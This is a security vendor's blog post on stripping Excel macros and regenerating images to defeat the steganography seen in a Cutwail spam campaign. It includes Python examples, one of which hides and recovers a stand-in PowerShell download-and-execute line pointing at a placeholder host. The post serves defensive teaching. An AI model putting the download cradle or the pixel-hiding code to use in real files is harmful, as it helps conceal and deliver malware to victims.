Data Sanitization against Steganography, Evasion

We warned about the risk of steganography in a previous blog post. Steganography is the practice of concealing messages, images, videos or malware inside another file or message, so that the carrier looks ordinary. We have now observed steganography in actual attacks*. Just last week, CrowdStrike published its findings on a Cutwail spam campaign delivered in Japanese-language emails, and steganography was one of the tactics the attackers used. In this post we use that campaign as the example to demonstrate how OPSWAT Data Sanitization defeats steganography and the evasion tactics around it.

We can split this spam campaign into four stages as follows (Data Sanitization is applied at stages 1, 2 and 3):

Stage 1: phishing email with a Microsoft Excel attachment

Stage 2: obfuscated VBA scripts inside of a Microsoft Excel document

Stage 3: steganographic image containing an obfuscated PowerShell script

Stage 4: final payload

Stages 1 and 2: phishing email with a Microsoft Excel attachment containing obfuscated VBA scripts

Email is the most common way for an attacker to gain initial access to a victim's network. OPSWAT MetaDefender (https://www.opswat.com/product... ) detects the file type from the file's contents, not just its extension, so renaming an attachment does not change how it is classified. Suppose the security policy allows Microsoft Excel documents, since they are a very common file type needed for business productivity. Even so, OPSWAT Data Sanitization reconstructs a new Microsoft Excel file while stripping out the macro. OPSWAT does not try to determine whether the VBA script is malicious; the macro is removed regardless of what it contains, so obfuscation cannot evade this countermeasure. Below is the Excel document used in this spam campaign, before and after sanitization.
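As an added illustration of the two mechanisms just described (content-based file typing and macro removal by reconstruction), here is a small Python script written for this post. It is not OPSWAT's code and does not show how MetaDefender is implemented; it identifies an Office file by its magic bytes and package contents regardless of extension, then rebuilds a macro-enabled workbook into a fresh archive with the VBA project and every reference to it dropped. The sample workbook it builds is constructed inline with the minimum parts needed, and all function and constant names are the example's own.

```python
import io
import re
import zipfile

# Magic bytes for the two Office container formats (constants chosen for this
# example, not OPSWAT's detection tables).
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy binary .xls/.doc
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML .xlsx/.xlsm/.docx

MACRO_MAIN = "application/vnd.ms-excel.sheet.macroEnabled.main+xml"
PLAIN_MAIN = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"


def part_names(data: bytes) -> set:
    """Part names inside an OOXML package (empty set if it is not a zip)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return set(zf.namelist())
    except zipfile.BadZipFile:
        return set()


def read_part(data: bytes, name: str) -> str:
    """Return one XML part of the package as text."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name).decode("utf-8")


def identify(data: bytes) -> str:
    """Classify by content; the file's extension is never consulted."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        names = part_names(data)
        if "xl/workbook.xml" in names:
            return "xlsm" if "xl/vbaProject.bin" in names else "xlsx"
        return "zip"
    return "unknown"


def strip_macros(data: bytes) -> bytes:
    """Rebuild the workbook into a fresh archive without its VBA project.

    vbaProject.bin is dropped and the two places that point at it
    ([Content_Types].xml and the workbook relationships) are edited so the
    result opens as an ordinary .xlsx. The VBA itself is never parsed, so
    obfuscation inside it changes nothing.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, \
            zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            if name == "xl/vbaProject.bin":
                continue
            content = src.read(name)
            if name == "[Content_Types].xml":
                text = content.decode("utf-8")
                text = re.sub(r'<Override[^>]*vbaProject\.bin"[^>]*/>', "", text)
                content = text.replace(MACRO_MAIN, PLAIN_MAIN).encode("utf-8")
            elif name == "xl/_rels/workbook.xml.rels":
                text = content.decode("utf-8")
                text = re.sub(r'<Relationship[^>]*vbaProject\.bin"[^>]*/>', "", text)
                content = text.encode("utf-8")
            dst.writestr(name, content)
    return buf.getvalue()


def build_sample(with_macro: bool) -> bytes:
    """Constructed minimal workbook package: just enough parts to be realistic."""
    main = MACRO_MAIN if with_macro else PLAIN_MAIN
    types = ('<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
             '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
             '<Default Extension="xml" ContentType="application/xml"/>'
             f'<Override PartName="/xl/workbook.xml" ContentType="{main}"/>')
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>')
    if with_macro:
        types += '<Override PartName="/xl/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>'
        rels += '<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", types + "</Types>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/_rels/workbook.xml.rels", rels + "</Relationships>")
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        if with_macro:
            # Stand-in for the OLE2 VBA project; real ones are binary streams.
            zf.writestr("xl/vbaProject.bin", OLE2_MAGIC + b"Sub Auto_Open() ... End Sub")
    return buf.getvalue()


if __name__ == "__main__":
    attachment = build_sample(with_macro=True)       # arrives named, say, report.xlsx
    print("detected by content:", identify(attachment))            # xlsm
    clean = strip_macros(attachment)
    print("after sanitization:", identify(clean))                  # xlsx
    print("vbaProject.bin still present:", "xl/vbaProject.bin" in part_names(clean))
```

Two points worth noticing in the code: classification looks at the package parts, so a `.xlsm` renamed to `.xlsx` (or to `.zip`) is still reported as a macro-enabled workbook, and sanitization copies every part into a new archive rather than editing the original in place, which is what makes the outcome independent of how cleverly the VBA was obfuscated.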


Before:

After:

Stage 3: steganographic image containing an obfuscated PowerShell script

Suppose an organization cannot prohibit macro usage as part of its security policy, so the Excel macro is allowed to run. Even in this case, OPSWAT Data Sanitization regenerates the image so that it no longer carries the embedded script: the loader extracts nothing usable from it, and the attacker fails to download the final payload.

From the user's point of view, there is no visible difference between the original and the sanitized image.

Before Sanitization

After Sanitization
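To make the stage 3 mechanism concrete, the following Python script (an added example for this post, not OPSWAT's code and not the CrowdStrike sample) embeds a constructed stand-in for the PowerShell stager into the least significant bits of a synthetic RGB pixel buffer, recovers it the way a loader would, and then regenerates the picture the way a content-disarm step does. The regeneration used here, re-rendering every channel from its upper 7 bits, is a simplified model chosen for illustration and is not OPSWAT's actual transformation. The payload host uses the reserved .invalid domain, the pixel data is generated in code, and no image file or image library is involved.

```python
import random

# Constructed synthetic cover: a 64x64 RGB picture kept as a flat bytearray
# (R,G,B,R,G,B,...), standing in for the decoded pixels of a PNG.
WIDTH, HEIGHT = 64, 64

# Constructed stand-in for the stager hidden in the picture; the host is the
# reserved .invalid TLD, not a real indicator.
PAYLOAD = b"IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage4')"


def make_cover_image(seed: int = 7) -> bytearray:
    """Deterministic gradient plus a little noise, so the LSBs look natural."""
    rng = random.Random(seed)
    px = bytearray()
    for y in range(HEIGHT):
        for x in range(WIDTH):
            px.append(min(255, x * 4 + rng.randrange(8)))   # R
            px.append(min(255, y * 4 + rng.randrange(8)))   # G
            px.append(128 + rng.randrange(8))               # B
    return px


def embed_lsb(pixels: bytes, payload: bytes) -> bytearray:
    """Attacker side: write a 4-byte length prefix and the payload, one bit
    per colour channel, into the least significant bit of each byte."""
    data = len(payload).to_bytes(4, "big") + payload
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("cover image too small for payload")
    out = bytearray(pixels)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return out


def extract_lsb(pixels: bytes) -> bytes:
    """Loader side (what the macro/PowerShell stage does): read the length
    prefix, then that many bytes, from the channel LSBs."""
    def read_bytes(first_bit: int, count: int) -> bytes:
        out = bytearray()
        for b in range(count):
            value = 0
            for i in range(8):
                value = (value << 1) | (pixels[first_bit + b * 8 + i] & 1)
            out.append(value)
        return bytes(out)

    length = int.from_bytes(read_bytes(0, 4), "big")
    if 32 + length * 8 > len(pixels):
        return b""          # length prefix is garbage: nothing to recover
    return read_bytes(32, length)


def regenerate(pixels: bytes) -> bytearray:
    """Illustrative CDR step (not OPSWAT's algorithm): re-render every channel
    from its upper 7 bits, so the output LSB depends only on the visible
    colour and the attacker's bit is never copied through. Each channel
    moves by at most 1 out of 255, below what a viewer can notice."""
    return bytearray((v >> 1) * 255 // 127 for v in pixels)


def max_channel_delta(a: bytes, b: bytes) -> int:
    """Largest per-channel change between two images of the same size."""
    return max(abs(x - y) for x, y in zip(a, b))


if __name__ == "__main__":
    cover = make_cover_image()
    stego = embed_lsb(cover, PAYLOAD)
    print("payload survives a byte-for-byte copy:",
          extract_lsb(bytes(stego)) == PAYLOAD)
    clean = regenerate(stego)
    print("largest visible change per channel (0-255):",
          max_channel_delta(stego, clean))
    print("payload recovered after regeneration:",
          extract_lsb(bytes(clean)) == PAYLOAD)
```

The numbers make the point of the before/after pictures above: the regenerated image differs from the steganographic one by at most one level per channel, so the two look identical, yet the loader recovers nothing. Two caveats for anyone building on this: a real sanitizer re-encodes or resamples the whole picture rather than touching only the lowest bit (an attacker who knows the exact transformation can hide data in bits that survive it), and regeneration only acts on images that actually pass through the sanitizing channel, so the path the macro uses to fetch the image has to be covered as well.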

* References: actual attacks using steganography

https://blog.trendmicro.com/tr...

https://www.imperva.com/blog/d...

https://securityintelligence.c...

co-authored by Vinh Lam
